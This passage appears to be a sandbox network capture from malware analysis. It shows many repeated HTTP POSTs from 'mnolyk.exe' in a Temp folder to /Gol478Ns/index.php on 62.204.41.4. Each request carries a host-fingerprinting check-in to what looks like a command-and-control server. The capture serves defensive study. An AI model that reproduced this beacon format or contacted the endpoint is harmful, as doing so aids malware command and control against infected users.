Feb 7, 2023 20:03:27.968347073 CET	703	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
549	192.168.2.6	50274	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:28.142137051 CET	704	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:28.208792925 CET	704	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.6	49774	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:04.281618118 CET	168	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:04.345859051 CET	168	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
550	192.168.2.6	50275	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:28.403496027 CET	705	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:28.467736006 CET	705	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
551	192.168.2.6	50276	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:28.648273945 CET	706	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:28.713113070 CET	706	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
552	192.168.2.6	50277	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:28.892621040 CET	707	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:28.957741976 CET	707	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
553	192.168.2.6	50278	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:29.144512892 CET	708	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:29.212220907 CET	708	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
554	192.168.2.6	50279	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:29.390955925 CET	708	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:29.456379890 CET	709	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
555	192.168.2.6	50280	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:29.633131027 CET	710	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:29.698019981 CET	710	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
556	192.168.2.6	50281	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:29.880685091 CET	711	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:29.945671082 CET	711	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
557	192.168.2.6	50282	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:30.132021904 CET	712	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:30.197393894 CET	712	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
558	192.168.2.6	50283	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:30.376799107 CET	713	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:30.440956116 CET	713	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
559	192.168.2.6	50284	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:30.624650955 CET	714	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:30.689337015 CET	714	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.6	49775	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:04.516284943 CET	169	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:04.580698013 CET	169	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
560	192.168.2.6	50285	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:30.859757900 CET	715	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:30.922893047 CET	715	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
561	192.168.2.6	50286	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:31.095392942 CET	716	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:31.160752058 CET	716	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
562	192.168.2.6	50287	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:31.342736959 CET	717	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:31.406748056 CET	717	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
563	192.168.2.6	50288	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:31.578001022 CET	718	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:31.641931057 CET	718	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
564	192.168.2.6	50289	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:31.813234091 CET	719	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:31.878911972 CET	719	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
565	192.168.2.6	50290	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:32.058144093 CET	720	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:32.123802900 CET	720	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
566	192.168.2.6	50291	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:32.300203085 CET	721	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:32.363375902 CET	721	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
567	192.168.2.6	50292	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:03:32.559191942 CET	722	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:03:32.622472048 CET	722	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
568	192.168.2.6	50293	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
